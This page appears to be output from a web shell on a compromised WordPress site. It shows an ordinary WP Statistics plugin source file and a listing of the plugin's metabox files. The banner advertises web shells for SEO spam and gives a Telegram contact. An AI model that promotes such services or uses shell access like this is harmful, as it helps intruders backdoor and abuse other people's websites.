__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
namespace WP_Statistics\Service\Admin\Metabox\Metaboxes;
use WP_Statistics\Components\View;
use WP_Statistics\Abstracts\BaseMetabox;
use WP_STATISTICS\Helper;
use WP_STATISTICS\Menus;
use WP_STATISTICS\Option;
class AboutWPS extends BaseMetabox
{
protected $settings = [
'custom_widget' => '',
'title' => '',
'content' => ''
];
protected $key = 'about';
protected $context = 'side';
protected $static = true;
public function __construct()
{
if (! Helper::isAddOnActive('customization')) {
return;
}
$this->settings = [
'custom_widget' => Option::getByAddon('show_wps_about_widget_overview', 'customization', 'yes'),
'title' => Option::getByAddon('wps_about_widget_title', 'customization', ''),
'content' => Option::getByAddon('wps_about_widget_content', 'customization', ''),
];
}
public function getKey()
{
if ($this->settings['custom_widget'] === 'yes') {
$this->key = "custom-{$this->key}";
}
return "wp-statistics-{$this->key}-metabox";
}
public function getName()
{
if ($this->settings['custom_widget'] === 'yes' && !empty($this->settings['title'])) {
return $this->settings['title'];
}
return esc_html__('WP Statistics', 'wp-statistics');
}
public function getDescription()
{
return '';
}
public function getScreen()
{
return [Menus::get_action_menu_slug('overview')];
}
public function getData()
{
return false;
}
public function render()
{
if ($this->settings['custom_widget'] === 'yes') {
echo '<div class="o-wrap o-wrap--no-data">' . $this->settings['content'] . '</div>';
} else {
View::load('metabox/about', []);
}
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| AboutWPS.php | File | 1.89 KB | 0644 |
|
| BrowserUsage.php | File | 1.63 KB | 0644 |
|
| CurrentlyOnline.php | File | 1.21 KB | 0644 |
|
| DailyTrafficTrend.php | File | 1.28 KB | 0644 |
|
| DeviceUsageBreakdown.php | File | 1.67 KB | 0644 |
|
| GlobalVisitorDistribution.php | File | 1.06 KB | 0644 |
|
| GoPremium.php | File | 820 B | 0644 |
|
| LatestVisitor.php | File | 1.13 KB | 0644 |
|
| MostActiveVisitors.php | File | 1.48 KB | 0644 |
|
| MostVisitedPages.php | File | 1.4 KB | 0644 |
|
| OperatingSystems.php | File | 1.66 KB | 0644 |
|
| PostSummary.php | File | 1.2 KB | 0644 |
|
| SearchEngines.php | File | 1.31 KB | 0644 |
|
| TopCountries.php | File | 1.65 KB | 0644 |
|
| TopDeviceModel.php | File | 1.56 KB | 0644 |
|
| TopReferring.php | File | 1.34 KB | 0644 |
|
| TrafficOverview.php | File | 1.04 KB | 0644 |
|
| TrafficSummary.php | File | 868 B | 0644 |
|